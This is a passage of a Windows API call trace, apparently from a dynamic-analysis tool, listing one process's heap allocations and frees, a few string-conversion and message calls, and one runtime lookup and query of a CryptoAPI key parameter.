[0113.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0113.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0113.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0113.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797088 [0113.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0113.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0113.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0113.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0113.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0113.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0113.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0113.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0113.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0113.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0113.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0113.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0113.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0113.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0113.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0113.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0113.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0113.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0113.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0113.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0113.303] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0113.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0113.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0113.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0113.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0113.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0113.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0113.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0113.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0113.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0113.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0113.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0113.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0113.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0113.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0113.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0113.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0113.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0113.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0113.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0113.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0113.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0113.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0113.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0113.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0113.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0113.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0113.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0113.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0113.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0113.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0113.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0113.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0113.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0113.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0113.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0113.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0113.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0113.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0113.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0113.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0113.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0113.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0113.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0113.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0113.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0113.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0113.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0113.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0113.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0113.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0113.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0113.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0113.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0113.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0113.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0113.305] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0113.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1796e28 [0113.305] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796e28, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0113.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0113.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0113.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0113.305] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0113.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0113.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0113.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0113.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0113.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0113.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0113.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0113.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0113.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0113.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0113.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0113.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0113.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0113.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0113.305] CryptGetKeyParam (in: hKey=0x41ac280, dwParam=0x7, pbData=0x43e27b0, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e27b0*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0113.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0113.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea6b8 [0113.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0113.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0113.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0113.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0113.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0113.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0113.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0113.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0113.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0113.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0113.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0113.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0113.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0113.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0113.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0113.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0113.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0113.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0113.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0113.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0113.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0113.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0113.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0113.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0113.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0113.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0113.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0113.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0113.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0113.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797008 [0113.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0113.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0113.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0113.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0113.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0113.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0113.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0113.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0113.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0113.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0113.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0113.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0113.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0113.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0113.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0113.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0113.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0113.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0113.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0113.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0113.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0113.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0113.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0113.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0113.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0113.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0113.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0113.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0113.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0113.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0113.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0113.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0113.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0113.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0113.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0113.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0113.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0113.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0113.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0113.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0113.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0113.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0113.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0113.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0113.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0113.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0113.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0113.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0113.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0113.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0113.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0113.361] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0113.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0113.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0113.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0113.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0113.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0113.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0113.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0113.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9e18 [0113.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0113.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e18 | out: hHeap=0x1780000) returned 1 [0113.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0113.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0113.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0113.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0113.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0113.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0113.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0113.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0113.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0113.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0113.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0113.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9350 [0113.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0113.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0113.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0113.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0113.362] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0113.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0113.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0113.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0113.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0113.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0113.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0113.362] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0113.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0113.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0113.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0113.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0113.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0113.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0113.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0113.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0113.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0113.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0113.363] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0113.363] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0113.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0113.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0113.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0113.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0113.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2668 | out: hHeap=0x1780000) returned 1 [0113.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 